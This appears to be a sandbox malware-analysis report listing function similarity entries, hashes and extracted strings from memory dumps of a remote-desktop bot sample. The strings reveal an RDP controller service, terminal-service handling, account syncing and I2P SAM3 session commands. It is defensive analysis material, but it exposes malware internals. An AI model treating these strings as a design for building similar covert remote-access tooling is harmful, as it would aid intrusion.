                                                                    • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                    • API String ID: 1980715187-2022313065
                                                                    • Opcode ID: 352408240713be7a7cb69aa9724280b692f81e1d013cd9d5b02acbcca2736477
                                                                    • Instruction ID: 1a8643c4c395d42c07aab53cae11a2985ec10d5bd63d6fae1d9234fbfa18754a
                                                                    • Opcode Fuzzy Hash: 352408240713be7a7cb69aa9724280b692f81e1d013cd9d5b02acbcca2736477
                                                                    • Instruction Fuzzy Hash: AAA10161D0C74BA1F6309BC8A8403797350AF00748E541337EB5ECAAB1EE6DA9C9D7C2
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$AllocCreateEnterLeaveProcessThread
                                                                    • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
                                                                    • API String ID: 3282357527-375624272
                                                                    • Opcode ID: 7a0a3bce79b1013c93c0ed9f4f6e98f2c711db9e4a5f9ad0e19da206398e9982
                                                                    • Instruction ID: 5599f6cafe15189994e89abfb2e68b5d7bbbde894e2f81d1b8abbebd12b1208f
                                                                    • Opcode Fuzzy Hash: 7a0a3bce79b1013c93c0ed9f4f6e98f2c711db9e4a5f9ad0e19da206398e9982
                                                                    • Instruction Fuzzy Hash: 75516560A08E0389FA149B17A85037D2291EF657B4F2403B5D93D677FADF3CE4459309
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                    • API String ID: 2122475568-588975189
                                                                    • Opcode ID: 9d059f1f5dd7415c002bfc40bca07d3c4d82ce6738f01354cf924633f6badd35
                                                                    • Instruction ID: bd35fc5699bf01aebff2e05e333e1ada86f5d2a7daa10b81e3bdcda18423152c
                                                                    • Opcode Fuzzy Hash: 9d059f1f5dd7415c002bfc40bca07d3c4d82ce6738f01354cf924633f6badd35
                                                                    • Instruction Fuzzy Hash: 65513AB6A08A4686EB50CF29E44436977A1FB88B88F504137DADE43769DF3CE949C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                    • API String ID: 2122475568-588975189
                                                                    • Opcode ID: 1eedadad500edf32e04d263bd9f55e9cc564723da34f8de4d54f81d13fbb1ac2
                                                                    • Instruction ID: 6c88bdfdf5b02dce101cf4c0776355e528af4b8f3ef55cb3f77c4fa0a1c99956
                                                                    • Opcode Fuzzy Hash: 1eedadad500edf32e04d263bd9f55e9cc564723da34f8de4d54f81d13fbb1ac2
                                                                    • Instruction Fuzzy Hash: F2513BB6A08B4686EB50CF29E44436977A1FB88B84F504137DADD43769DF3CE949C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                    • API String ID: 2122475568-588975189
                                                                    • Opcode ID: dcc62bcad00684de019104841a8f931329f32da96cad2cceaff96aeb97c58103
                                                                    • Instruction ID: b7a7b5279b0cc6e4a0512f896bf786eb8abf507c7f25631b013896d5e4daffaa
                                                                    • Opcode Fuzzy Hash: dcc62bcad00684de019104841a8f931329f32da96cad2cceaff96aeb97c58103
                                                                    • Instruction Fuzzy Hash: 05513BB6A08A4686EB50CF29E44436977A1FB88B84F504137DADD43769DF3CE949C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                    • API String ID: 2122475568-588975189
                                                                    • Opcode ID: c284144d680ec4523087ec0b6fb13f06a2fc4852147986030773929b24b80cc0
                                                                    • Instruction ID: 78228c381e1b49e26cec74d7172dc70ef9668cb83fc3ac541a6a45e76ca4a212
                                                                    • Opcode Fuzzy Hash: c284144d680ec4523087ec0b6fb13f06a2fc4852147986030773929b24b80cc0
                                                                    • Instruction Fuzzy Hash: 74513AB6A08B4686EB50CF29E44436977A1FB88B88F504137DADE43769DF3CE949C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                                                                    • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                                                                    • API String ID: 546114577-3142219161
                                                                    • Opcode ID: dc7b3edb1b96fafe6ace2f878cfc270cb54aaa187ae3b6ec2148f67baf07579a
                                                                    • Instruction ID: 513430eb6ac1e6cff6ac8cc234575a1c6ce3b14a7c1b0d75befee7327d633898
                                                                    • Opcode Fuzzy Hash: dc7b3edb1b96fafe6ace2f878cfc270cb54aaa187ae3b6ec2148f67baf07579a
                                                                    • Instruction Fuzzy Hash: 6B41F791F0C72792FB309F14E8C03B822A4DF05348F605033CAEE862B1AE5DB9A59F45
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
                                                                    • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                                    • API String ID: 610085118-1825955162
                                                                    • Opcode ID: d395da0cd0e563953e347f6c3e1ff6171209d7113c194856135c7fc65377c92f
                                                                    • Instruction ID: a03f91f7e8cd8508369890db5986722c7142b007c04bbfcd4bfd2aa9154bd12b
                                                                    • Opcode Fuzzy Hash: d395da0cd0e563953e347f6c3e1ff6171209d7113c194856135c7fc65377c92f
                                                                    • Instruction Fuzzy Hash: 44516935A09E42CAE7148B13E84027DB764EFA4BB0F1805B5DA6E27779DF3CE4459348
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                                    • API String ID: 1721699506-2273971785
                                                                    • Opcode ID: fb69f4271079308d6a773b76607419c5d5bd62e2c2092df690b093a9c085742d
                                                                    • Instruction ID: f4e25294ae09135b2780b771e3cc43bbe52302ff400b78b45abc55dc08e18ece
                                                                    • Opcode Fuzzy Hash: fb69f4271079308d6a773b76607419c5d5bd62e2c2092df690b093a9c085742d
                                                                    • Instruction Fuzzy Hash: A4612662A0C547A5FA208FDCE9453B83352AF82758F555732E74DCB2B4DF3CAA468381
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CompareFileTime
                                                                    • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                                                                    • API String ID: 342285119-844192579
                                                                    • Opcode ID: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                                                                    • Instruction ID: aa831c8a0f45772ed7ff321e86cebc49aeb8f68307bdae3b20cff4b5e4256a1c
                                                                    • Opcode Fuzzy Hash: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                                                                    • Instruction Fuzzy Hash: 5051B1A1B0C78341FB31AE65A8507BA5791DF867C4F480031DACE4B7AAEE7CE9458F00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait
                                                                    • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
                                                                    • API String ID: 4048354325-2700516951
                                                                    • Opcode ID: f1f7ff5df265827d3a91aa5157ed775dd8634fc87730bdea0f9728a511b8d6c8
                                                                    • Instruction ID: 3e83b0df33ca0d883b40416cdb6f69cb63c5fc1ce647eb6756892abca4470e42
                                                                    • Opcode Fuzzy Hash: f1f7ff5df265827d3a91aa5157ed775dd8634fc87730bdea0f9728a511b8d6c8
                                                                    • Instruction Fuzzy Hash: B341EC25A09E06C9EB549F13D89427822A0EF64F75F1806B5CA3D6A3FADF3CE4549218
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strcpystrlen$strcmp
                                                                    • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
                                                                    • API String ID: 245486318-5999096
                                                                    • Opcode ID: b1d516ec78f043b51f4bb9592c15b4c7a3a8f9ece91934b62f30e2b7040c59d9
                                                                    • Instruction ID: 87a67200fd623e8989c67b10776203e6e07dc5ac5df1777e7bd31cf92bd09347
                                                                    • Opcode Fuzzy Hash: b1d516ec78f043b51f4bb9592c15b4c7a3a8f9ece91934b62f30e2b7040c59d9
                                                                    • Instruction Fuzzy Hash: 40718D26E0EE4681EB219AAB991037D2269AF457B4F5403B9DD7D077F9FF3CA9018340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                                                                    • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                                                                    • API String ID: 3562457520-1478336053
                                                                    • Opcode ID: 7523986f2e4a8506a5b5db29a01fe4c528107e2010c565d689efa6122ba216ed
                                                                    • Instruction ID: 2d803125aa09eba3a75066dcef2330767858fc106d7e4614c1595d6e2db727b2
                                                                    • Opcode Fuzzy Hash: 7523986f2e4a8506a5b5db29a01fe4c528107e2010c565d689efa6122ba216ed
                                                                    • Instruction Fuzzy Hash: 8251E450F0D603A2FB6057DC94943B833809F18345F204336EB4EDA2F2DE6EA98693D2
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree$fflushfwritestrlen
                                                                    • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
                                                                    • API String ID: 1135201459-1870638116
                                                                    • Opcode ID: 1e91a4f4fdc315e7e27d561fc3d5643d67a379c9ff2c5bd6a66a50cb92b2c765
                                                                    • Instruction ID: d70b0d94bf0101836433397fb6491dc0878d48b2e86c2903dc3f2abbd3ea812c
                                                                    • Opcode Fuzzy Hash: 1e91a4f4fdc315e7e27d561fc3d5643d67a379c9ff2c5bd6a66a50cb92b2c765
                                                                    • Instruction Fuzzy Hash: 5D31A451A0EE4295FB609B97E8443B92269BF84BE0F5840B8DD0E467B9EE2CE504C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFreestrcpystrlen
                                                                    • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
                                                                    • API String ID: 925994320-1558387473
                                                                    • Opcode ID: 711575fe787fea8fe66afaf681d5257aa99ee325125eba93f4346aa83786c236
                                                                    • Instruction ID: 45bbc7bd6f863d5935f3cfa0eb40394e9e50792d438222bb1db7b9f00b197065
                                                                    • Opcode Fuzzy Hash: 711575fe787fea8fe66afaf681d5257aa99ee325125eba93f4346aa83786c236
                                                                    • Instruction Fuzzy Hash: 8D418CA1A09A4786FA40AB55E84037927B1BF88B94F55403AEEDE073B7DE7CE945C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen
                                                                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                                    • API String ID: 39653677-3852240402
                                                                    • Opcode ID: 46a9fd6f5dbb93ca6dc34309958f871f51596f7697ab3bf8847f5162564302a0
                                                                    • Instruction ID: 2ade13679e0ac96306c0afb5ff190301011b98bbe96b741c4fb1c50c725c1fe0
                                                                    • Opcode Fuzzy Hash: 46a9fd6f5dbb93ca6dc34309958f871f51596f7697ab3bf8847f5162564302a0
                                                                    • Instruction Fuzzy Hash: C0414C61908A47A1FA119FDCA9143F83351BF45788F545332E75E8B2B5EF3CE50A8380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                                                                    • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                                                                    • API String ID: 2278979430-4175654481
                                                                    • Opcode ID: 8cfad7c4b0e55ec5b44f591262298208453b317aa6e890f299361d1c5236cc2b
                                                                    • Instruction ID: 6c704ef07ace6f3ce16726311adacf212a8966cbf82488177c1e2ffbd6108a8f
